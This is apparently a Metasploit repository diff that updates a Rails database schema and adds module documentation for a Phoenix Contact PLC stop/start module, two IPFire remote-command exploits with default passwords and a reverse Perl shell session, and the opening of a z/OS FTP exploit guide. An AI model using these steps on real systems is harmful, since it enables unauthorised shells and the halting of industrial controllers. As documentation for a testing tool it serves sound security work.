t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "host_details", force: true do |t|
|
||||
create_table "host_details", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.integer "nx_console_id"
|
||||
t.integer "nx_device_id"
|
||||
|
@ -151,7 +151,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.float "nx_risk_score"
|
||||
end
|
||||
|
||||
create_table "hosts", force: true do |t|
|
||||
create_table "hosts", force: :cascade do |t|
|
||||
t.datetime "created_at"
|
||||
t.inet "address", null: false
|
||||
t.string "mac"
|
||||
|
@ -186,12 +186,12 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "hosts", ["state"], name: "index_hosts_on_state", using: :btree
|
||||
add_index "hosts", ["workspace_id", "address"], name: "index_hosts_on_workspace_id_and_address", unique: true, using: :btree
|
||||
|
||||
create_table "hosts_tags", force: true do |t|
|
||||
create_table "hosts_tags", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.integer "tag_id"
|
||||
end
|
||||
|
||||
create_table "listeners", force: true do |t|
|
||||
create_table "listeners", force: :cascade do |t|
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
|
@ -205,7 +205,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "macro"
|
||||
end
|
||||
|
||||
create_table "loots", force: true do |t|
|
||||
create_table "loots", force: :cascade do |t|
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
t.integer "host_id"
|
||||
t.integer "service_id"
|
||||
|
@ -222,7 +222,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "loots", ["module_run_id"], name: "index_loots_on_module_run_id", using: :btree
|
||||
|
||||
create_table "macros", force: true do |t|
|
||||
create_table "macros", force: :cascade do |t|
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.text "owner"
|
||||
|
@ -232,7 +232,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.binary "prefs"
|
||||
end
|
||||
|
||||
create_table "metasploit_credential_cores", force: true do |t|
|
||||
create_table "metasploit_credential_cores", force: :cascade do |t|
|
||||
t.integer "origin_id", null: false
|
||||
t.string "origin_type", null: false
|
||||
t.integer "private_id"
|
||||
|
@ -256,7 +256,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "(((realm_id IS NOT NULL) AND (public_id IS NOT NULL)) AND (private_id IS NULL))", using: :btree
|
||||
add_index "metasploit_credential_cores", ["workspace_id"], name: "index_metasploit_credential_cores_on_workspace_id", using: :btree
|
||||
|
||||
create_table "metasploit_credential_logins", force: true do |t|
|
||||
create_table "metasploit_credential_logins", force: :cascade do |t|
|
||||
t.integer "core_id", null: false
|
||||
t.integer "service_id", null: false
|
||||
t.string "access_level"
|
||||
|
@ -269,7 +269,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "metasploit_credential_logins", ["core_id", "service_id"], name: "index_metasploit_credential_logins_on_core_id_and_service_id", unique: true, using: :btree
|
||||
add_index "metasploit_credential_logins", ["service_id", "core_id"], name: "index_metasploit_credential_logins_on_service_id_and_core_id", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_cracked_passwords", force: true do |t|
|
||||
create_table "metasploit_credential_origin_cracked_passwords", force: :cascade do |t|
|
||||
t.integer "metasploit_credential_core_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -277,7 +277,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_cracked_passwords", ["metasploit_credential_core_id"], name: "originating_credential_cores", using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_imports", force: true do |t|
|
||||
create_table "metasploit_credential_origin_imports", force: :cascade do |t|
|
||||
t.text "filename", null: false
|
||||
t.integer "task_id"
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -286,7 +286,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_imports", ["task_id"], name: "index_metasploit_credential_origin_imports_on_task_id", using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_manuals", force: true do |t|
|
||||
create_table "metasploit_credential_origin_manuals", force: :cascade do |t|
|
||||
t.integer "user_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -294,7 +294,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_manuals", ["user_id"], name: "index_metasploit_credential_origin_manuals_on_user_id", using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_services", force: true do |t|
|
||||
create_table "metasploit_credential_origin_services", force: :cascade do |t|
|
||||
t.integer "service_id", null: false
|
||||
t.text "module_full_name", null: false
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -303,7 +303,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_services", ["service_id", "module_full_name"], name: "unique_metasploit_credential_origin_services", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_origin_sessions", force: true do |t|
|
||||
create_table "metasploit_credential_origin_sessions", force: :cascade do |t|
|
||||
t.text "post_reference_name", null: false
|
||||
t.integer "session_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -312,7 +312,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_origin_sessions", ["session_id", "post_reference_name"], name: "unique_metasploit_credential_origin_sessions", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_privates", force: true do |t|
|
||||
create_table "metasploit_credential_privates", force: :cascade do |t|
|
||||
t.string "type", null: false
|
||||
t.text "data", null: false
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -322,7 +322,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_privates", ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_publics", force: true do |t|
|
||||
create_table "metasploit_credential_publics", force: :cascade do |t|
|
||||
t.string "username", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -331,7 +331,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_publics", ["username"], name: "index_metasploit_credential_publics_on_username", unique: true, using: :btree
|
||||
|
||||
create_table "metasploit_credential_realms", force: true do |t|
|
||||
create_table "metasploit_credential_realms", force: :cascade do |t|
|
||||
t.string "key", null: false
|
||||
t.string "value", null: false
|
||||
t.datetime "created_at", null: false
|
||||
|
@ -340,27 +340,27 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "metasploit_credential_realms", ["key", "value"], name: "index_metasploit_credential_realms_on_key_and_value", unique: true, using: :btree
|
||||
|
||||
create_table "mod_refs", force: true do |t|
|
||||
create_table "mod_refs", force: :cascade do |t|
|
||||
t.string "module", limit: 1024
|
||||
t.string "mtype", limit: 128
|
||||
t.text "ref"
|
||||
end
|
||||
|
||||
create_table "module_actions", force: true do |t|
|
||||
create_table "module_actions", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
||||
add_index "module_actions", ["detail_id"], name: "index_module_actions_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_archs", force: true do |t|
|
||||
create_table "module_archs", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
||||
add_index "module_archs", ["detail_id"], name: "index_module_archs_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_authors", force: true do |t|
|
||||
create_table "module_authors", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
t.text "email"
|
||||
|
@ -368,7 +368,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "module_authors", ["detail_id"], name: "index_module_authors_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_details", force: true do |t|
|
||||
create_table "module_details", force: :cascade do |t|
|
||||
t.datetime "mtime"
|
||||
t.text "file"
|
||||
t.string "mtype"
|
||||
|
@ -391,21 +391,21 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "module_details", ["name"], name: "index_module_details_on_name", using: :btree
|
||||
add_index "module_details", ["refname"], name: "index_module_details_on_refname", using: :btree
|
||||
|
||||
create_table "module_mixins", force: true do |t|
|
||||
create_table "module_mixins", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
||||
add_index "module_mixins", ["detail_id"], name: "index_module_mixins_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_platforms", force: true do |t|
|
||||
create_table "module_platforms", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
||||
add_index "module_platforms", ["detail_id"], name: "index_module_platforms_on_detail_id", using: :btree
|
||||
|
||||
create_table "module_refs", force: true do |t|
|
||||
create_table "module_refs", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.text "name"
|
||||
end
|
||||
|
@ -413,7 +413,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "module_refs", ["detail_id"], name: "index_module_refs_on_detail_id", using: :btree
|
||||
add_index "module_refs", ["name"], name: "index_module_refs_on_name", using: :btree
|
||||
|
||||
create_table "module_runs", force: true do |t|
|
||||
create_table "module_runs", force: :cascade do |t|
|
||||
t.datetime "attempted_at"
|
||||
t.text "fail_detail"
|
||||
t.string "fail_reason"
|
||||
|
@ -433,7 +433,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "module_runs", ["session_id"], name: "index_module_runs_on_session_id", using: :btree
|
||||
add_index "module_runs", ["user_id"], name: "index_module_runs_on_user_id", using: :btree
|
||||
|
||||
create_table "module_targets", force: true do |t|
|
||||
create_table "module_targets", force: :cascade do |t|
|
||||
t.integer "detail_id"
|
||||
t.integer "index"
|
||||
t.text "name"
|
||||
|
@ -441,7 +441,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "module_targets", ["detail_id"], name: "index_module_targets_on_detail_id", using: :btree
|
||||
|
||||
create_table "nexpose_consoles", force: true do |t|
|
||||
create_table "nexpose_consoles", force: :cascade do |t|
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.boolean "enabled", default: true
|
||||
|
@ -457,7 +457,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "name"
|
||||
end
|
||||
|
||||
create_table "notes", force: true do |t|
|
||||
create_table "notes", force: :cascade do |t|
|
||||
t.datetime "created_at"
|
||||
t.string "ntype", limit: 512
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
|
@ -473,7 +473,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "notes", ["ntype"], name: "index_notes_on_ntype", using: :btree
|
||||
add_index "notes", ["vuln_id"], name: "index_notes_on_vuln_id", using: :btree
|
||||
|
||||
create_table "profiles", force: true do |t|
|
||||
create_table "profiles", force: :cascade do |t|
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.boolean "active", default: true
|
||||
|
@ -482,7 +482,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.binary "settings"
|
||||
end
|
||||
|
||||
create_table "refs", force: true do |t|
|
||||
create_table "refs", force: :cascade do |t|
|
||||
t.integer "ref_id"
|
||||
t.datetime "created_at"
|
||||
t.string "name", limit: 512
|
||||
|
@ -491,7 +491,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "refs", ["name"], name: "index_refs_on_name", using: :btree
|
||||
|
||||
create_table "report_templates", force: true do |t|
|
||||
create_table "report_templates", force: :cascade do |t|
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
t.string "created_by"
|
||||
t.string "path", limit: 1024
|
||||
|
@ -500,7 +500,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "reports", force: true do |t|
|
||||
create_table "reports", force: :cascade do |t|
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
t.string "created_by"
|
||||
t.string "rtype"
|
||||
|
@ -513,13 +513,13 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.string "name", limit: 63
|
||||
end
|
||||
|
||||
create_table "routes", force: true do |t|
|
||||
create_table "routes", force: :cascade do |t|
|
||||
t.integer "session_id"
|
||||
t.string "subnet"
|
||||
t.string "netmask"
|
||||
end
|
||||
|
||||
create_table "services", force: true do |t|
|
||||
create_table "services", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.datetime "created_at"
|
||||
t.integer "port", null: false
|
||||
|
@ -536,7 +536,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "services", ["proto"], name: "index_services_on_proto", using: :btree
|
||||
add_index "services", ["state"], name: "index_services_on_state", using: :btree
|
||||
|
||||
create_table "session_events", force: true do |t|
|
||||
create_table "session_events", force: :cascade do |t|
|
||||
t.integer "session_id"
|
||||
t.string "etype"
|
||||
t.binary "command"
|
||||
|
@ -546,7 +546,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "created_at"
|
||||
end
|
||||
|
||||
create_table "sessions", force: true do |t|
|
||||
create_table "sessions", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.string "stype"
|
||||
t.string "via_exploit"
|
||||
|
@ -565,7 +565,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "sessions", ["module_run_id"], name: "index_sessions_on_module_run_id", using: :btree
|
||||
|
||||
create_table "tags", force: true do |t|
|
||||
create_table "tags", force: :cascade do |t|
|
||||
t.integer "user_id"
|
||||
t.string "name", limit: 1024
|
||||
t.text "desc"
|
||||
|
@ -576,35 +576,35 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "task_creds", force: true do |t|
|
||||
create_table "task_creds", force: :cascade do |t|
|
||||
t.integer "task_id", null: false
|
||||
t.integer "cred_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "task_hosts", force: true do |t|
|
||||
create_table "task_hosts", force: :cascade do |t|
|
||||
t.integer "task_id", null: false
|
||||
t.integer "host_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "task_services", force: true do |t|
|
||||
create_table "task_services", force: :cascade do |t|
|
||||
t.integer "task_id", null: false
|
||||
t.integer "service_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "task_sessions", force: true do |t|
|
||||
create_table "task_sessions", force: :cascade do |t|
|
||||
t.integer "task_id", null: false
|
||||
t.integer "session_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
end
|
||||
|
||||
create_table "tasks", force: true do |t|
|
||||
create_table "tasks", force: :cascade do |t|
|
||||
t.integer "workspace_id", default: 1, null: false
|
||||
t.string "created_by"
|
||||
t.string "module"
|
||||
|
@ -622,7 +622,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.binary "settings"
|
||||
end
|
||||
|
||||
create_table "users", force: true do |t|
|
||||
create_table "users", force: :cascade do |t|
|
||||
t.string "username"
|
||||
t.string "crypted_password"
|
||||
t.string "password_salt"
|
||||
|
@ -637,7 +637,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.boolean "admin", default: true, null: false
|
||||
end
|
||||
|
||||
create_table "vuln_attempts", force: true do |t|
|
||||
create_table "vuln_attempts", force: :cascade do |t|
|
||||
t.integer "vuln_id"
|
||||
t.datetime "attempted_at"
|
||||
t.boolean "exploited"
|
||||
|
@ -649,7 +649,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.text "fail_detail"
|
||||
end
|
||||
|
||||
create_table "vuln_details", force: true do |t|
|
||||
create_table "vuln_details", force: :cascade do |t|
|
||||
t.integer "vuln_id"
|
||||
t.float "cvss_score"
|
||||
t.string "cvss_vector"
|
||||
|
@ -674,7 +674,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.string "nx_pci_compliance_status"
|
||||
end
|
||||
|
||||
create_table "vulns", force: true do |t|
|
||||
create_table "vulns", force: :cascade do |t|
|
||||
t.integer "host_id"
|
||||
t.integer "service_id"
|
||||
t.datetime "created_at"
|
||||
|
@ -691,12 +691,12 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "vulns", ["name"], name: "index_vulns_on_name", using: :btree
|
||||
add_index "vulns", ["origin_id"], name: "index_vulns_on_origin_id", using: :btree
|
||||
|
||||
create_table "vulns_refs", force: true do |t|
|
||||
create_table "vulns_refs", force: :cascade do |t|
|
||||
t.integer "ref_id"
|
||||
t.integer "vuln_id"
|
||||
end
|
||||
|
||||
create_table "web_forms", force: true do |t|
|
||||
create_table "web_forms", force: :cascade do |t|
|
||||
t.integer "web_site_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -708,7 +708,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
|
||||
add_index "web_forms", ["path"], name: "index_web_forms_on_path", using: :btree
|
||||
|
||||
create_table "web_pages", force: true do |t|
|
||||
create_table "web_pages", force: :cascade do |t|
|
||||
t.integer "web_site_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -728,7 +728,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "web_pages", ["path"], name: "index_web_pages_on_path", using: :btree
|
||||
add_index "web_pages", ["query"], name: "index_web_pages_on_query", using: :btree
|
||||
|
||||
create_table "web_sites", force: true do |t|
|
||||
create_table "web_sites", force: :cascade do |t|
|
||||
t.integer "service_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
@ -741,13 +741,13 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "web_sites", ["options"], name: "index_web_sites_on_options", using: :btree
|
||||
add_index "web_sites", ["vhost"], name: "index_web_sites_on_vhost", using: :btree
|
||||
|
||||
create_table "web_vulns", force: true do |t|
|
||||
create_table "web_vulns", force: :cascade do |t|
|
||||
t.integer "web_site_id", null: false
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
t.text "path", null: false
|
||||
t.string "method", limit: 1024, null: false
|
||||
t.text "params", null: false
|
||||
t.text "params"
|
||||
t.text "pname"
|
||||
t.integer "risk", null: false
|
||||
t.string "name", limit: 1024, null: false
|
||||
|
@ -766,7 +766,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
add_index "web_vulns", ["name"], name: "index_web_vulns_on_name", using: :btree
|
||||
add_index "web_vulns", ["path"], name: "index_web_vulns_on_path", using: :btree
|
||||
|
||||
create_table "wmap_requests", force: true do |t|
|
||||
create_table "wmap_requests", force: :cascade do |t|
|
||||
t.string "host"
|
||||
t.inet "address"
|
||||
t.integer "port"
|
||||
|
@ -783,7 +783,7 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at"
|
||||
end
|
||||
|
||||
create_table "wmap_targets", force: true do |t|
|
||||
create_table "wmap_targets", force: :cascade do |t|
|
||||
t.string "host"
|
||||
t.inet "address"
|
||||
t.integer "port"
|
||||
|
@ -793,12 +793,12 @@ ActiveRecord::Schema.define(version: 20150514182921) do
|
|||
t.datetime "updated_at"
|
||||
end
|
||||
|
||||
create_table "workspace_members", id: false, force: true do |t|
|
||||
create_table "workspace_members", id: false, force: :cascade do |t|
|
||||
t.integer "workspace_id", null: false
|
||||
t.integer "user_id", null: false
|
||||
end
|
||||
|
||||
create_table "workspaces", force: true do |t|
|
||||
create_table "workspaces", force: :cascade do |t|
|
||||
t.string "name"
|
||||
t.datetime "created_at", null: false
|
||||
t.datetime "updated_at", null: false
|
||||
|
|
|
@ -0,0 +1,118 @@
|
|||
PhoenixContact Programmable Logic Controllers are built are using a variant of
|
||||
ProConOS. The communicate using a proprietary protocol over ports TCP/1962 and
|
||||
TCP/41100 or TCP/20547. This protocol allows a user to remotely determine the
|
||||
PLC type, firmware and build number on port TCP/1962. A user can also
|
||||
determine the CPU State (Running or Stopped) and start or stop the CPU.
|
||||
|
||||
This functionality is confirmed for the PLC series ILC 15x and 17x on TCP port
|
||||
20547, and for the ILC 39x series on TCP port 41100. Other series may or
|
||||
may not work, but there is a good chance that they will
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This is a hardware zero-day vulnerability that CANNOT be patched. Possible
|
||||
mitigations include: pulling the plug (literally), using network isolation
|
||||
(Firewall, Router, IDS, IPS, network segmentation, etc...) or not allowing bad
|
||||
people on your network.
|
||||
|
||||
Most, if not all, PLC's (computers that control engines, robots, conveyor
|
||||
belts, sensors, camera's, doorlocks, CRACs ...) have vulnerabilities where,
|
||||
using their own tools, remote configuration and programming can be done
|
||||
*WITHOUT* authentication. Investigators and underground hackers are just now
|
||||
creating simple tools to convert the, often proprietary, protocols into simple
|
||||
scripts. The operating word here is proprietary. Right now, the only thing
|
||||
stopping very bad stuff from happening. PhoenixContact uses an (unnamed?)
|
||||
low-level protocol for connection, information exchange and configuration of
|
||||
its PLC devices. This script utilizes that protocol for finding information
|
||||
and switching the PLC mode from STOP to RUN and vice-versa.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
The following demonstrates a basic scenario, we "found" two devices with an open port TCP/1962:
|
||||
|
||||
```
|
||||
msf > search phoenix
|
||||
msf > use auxiliary/admin/scada/phoenix_command
|
||||
msf auxiliary(phoenix_command) > set RHOST 10.66.56.12
|
||||
RHOST => 10.66.56.12
|
||||
msf auxiliary(phoenix_command) > run
|
||||
|
||||
[*] 10.66.56.12:0 - PLC Type = ILC 150 GSM/GPRS
|
||||
[*] 10.66.56.12:0 - Firmware = 3.71
|
||||
[*] 10.66.56.12:0 - Build = 07/13/11 12:00:00
|
||||
[*] 10.66.56.12:0 - ------------------------------------
|
||||
[*] 10.66.56.12:0 - --> Detected 15x/17x series, getting current CPU state:
|
||||
[*] 10.66.56.12:0 - CPU Mode = RUN
|
||||
[*] 10.66.56.12:0 - ------------------------------------
|
||||
[*] 10.66.56.12:0 - --> No action specified (NOOP), stopping here
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
msf auxiliary(phoenix_command) > set RHOST 10.66.56.72
|
||||
RHOST => 10.66.56.72
|
||||
msf auxiliary(phoenix_command) > set ACTION REV
|
||||
ACTION => REV
|
||||
msf auxiliary(phoenix_command) > run
|
||||
[*] 10.66.56.72:0 - PLC Type = ILC 390 PN 2TX-IB
|
||||
[*] 10.66.56.72:0 - Firmware = 3.95
|
||||
[*] 10.66.56.72:0 - Build = 02/14/11 14:04:47
|
||||
[*] 10.66.56.72:0 - ------------------------------------
|
||||
[*] 10.66.56.72:0 - --> Detected 39x series, getting current CPU state:
|
||||
[*] 10.66.56.72:0 - CPU Mode = RUN
|
||||
[*] 10.66.56.72:0 - ------------------------------------
|
||||
[*] 10.66.56.72:0 - --> Sending STOP now
|
||||
[*] 10.66.56.72:0 - CPU Mode = STOP
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Module Options
|
||||
```
|
||||
msf auxiliary(phoenix_command) > show options
|
||||
|
||||
Module options (auxiliary/admin/scada/phoenix_command):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
ACTION NOOP yes PLC CPU action, REV means reverse state (Accepted: STOP, START, REV, NOOP)
|
||||
RHOST yes The target address
|
||||
RINFOPORT 1962 yes Set info port
|
||||
RPORT no Set action port, will try autodetect when not set
|
||||
```
|
||||
|
||||
By default, the module only reads out the PLC Type, Firmware version, Build
|
||||
date and current CPU mode (RUNing or STOPed)
|
||||
|
||||
The first three pieces of data (Type, Firmware & Build) are always found on
|
||||
port TCP/1962 (there is no way of changing that port on the PLC, so also no
|
||||
reason to change the 'RINFOPORT' option)
|
||||
|
||||
The CPU mode uses a TCP port depending on the PLC Type, the module will
|
||||
automatically detect the type and port to use, but can be overridden with the
|
||||
'RPORT' option, however no real reason to configure it. If you accidentally set RPORT, you can unset it with the ```unset RPORT``` command.
|
||||
|
||||
**The ACTION option**
|
||||
|
||||
Action has four possible values:
|
||||
|
||||
By default, the module will do nothing to the PLC, therefore No Operation or 'NOOP':
|
||||
|
||||
```
|
||||
msf auxiliary(phoenix_command) > set ACTION NOOP
|
||||
```
|
||||
|
||||
The PLC can be forced to go into STOP mode, meaning it stops all execution and all outputs are set to low:
|
||||
|
||||
```
|
||||
msf auxiliary(phoenix_command) > set ACTION STOP
|
||||
```
|
||||
|
||||
The PLC can be forced to go into RUN mode, where it keeps running it was or it will start executing its current boot programming:
|
||||
|
||||
```
|
||||
msf auxiliary(phoenix_command) > set ACTION START
|
||||
```
|
||||
|
||||
The module can also just read out the CPU mode and then reverse whatever it finds, RUN becomes STOP, STOP becomes RUN:
|
||||
|
||||
```
|
||||
msf auxiliary(phoenix_command) > set ACTION REV
|
||||
```
|
|
@ -0,0 +1,42 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
|
||||
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the firewall
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
|
||||
4. Do: ```set rhost 10.10.10.10```
|
||||
5. Do: ```set PASSWORD admin```
|
||||
6. Do: ```set CMD ls```
|
||||
7. Do: ```run```
|
||||
8. You should see the output of the command that was run.
|
||||
|
||||
## Options
|
||||
|
||||
**PASSWORD**
|
||||
|
||||
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
||||
|
||||
**CMD**
|
||||
|
||||
This is the command to run on the system.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Example of running the ID command
|
||||
```
|
||||
msf > use exploit/linux/http/ipfire_bashbug_exec
|
||||
msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
|
||||
PASSWORD => admin
|
||||
msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
|
||||
rhost => 192.168.2.202
|
||||
msf exploit(ipfire_bashbug_exec) > set CMD id
|
||||
CMD => id
|
||||
msf exploit(ipfire_bashbug_exec) > exploit
|
||||
|
||||
[+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
|
||||
[*] Exploit completed, but no session was created.
|
||||
```
|
|
@ -0,0 +1,47 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core100/ipfire-2.19.x86_64-full-core100.iso)
|
||||
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the firewall
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/ipfire_proxy_exec```
|
||||
4. Do: ```set password admin``` or whatever it was set to at install
|
||||
5. Do: ```set rhost 10.10.10.10```
|
||||
6. Do: ```set payload cmd/unix/reverse_perl```
|
||||
7. Do: ```set lhost 192.168.2.229```
|
||||
8. Do: ```exploit```
|
||||
9. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
**PASSWORD**
|
||||
|
||||
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/ipfire_proxy_exec
|
||||
msf exploit(ipfire_proxy_rce) > set password admin
|
||||
password => admin
|
||||
msf exploit(ipfire_proxy_rce) > set rhost 192.168.2.201
|
||||
rhost => 192.168.2.201
|
||||
msf exploit(ipfire_proxy_rce) > set payload cmd/unix/reverse_perl
|
||||
payload => cmd/unix/reverse_perl
|
||||
msf exploit(ipfire_proxy_rce) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(ipfire_proxy_rce) > set lhost 192.168.2.229
|
||||
lhost => 192.168.2.229
|
||||
msf exploit(ipfire_proxy_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.229:4444
|
||||
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400
|
||||
|
||||
id
|
||||
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
|
||||
whoami
|
||||
nobody
|
||||
```
|
|
@ -0,0 +1,108 @@
|
|||
z/OS JCL authorized FTP-base command execution - hints & tips
|
||||
|
||||
In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This exploit was tested on the ftp daemons for z/OS version 1.13 / 2.1
|
||||
|
||||
## Payloads
|
||||
|
||||
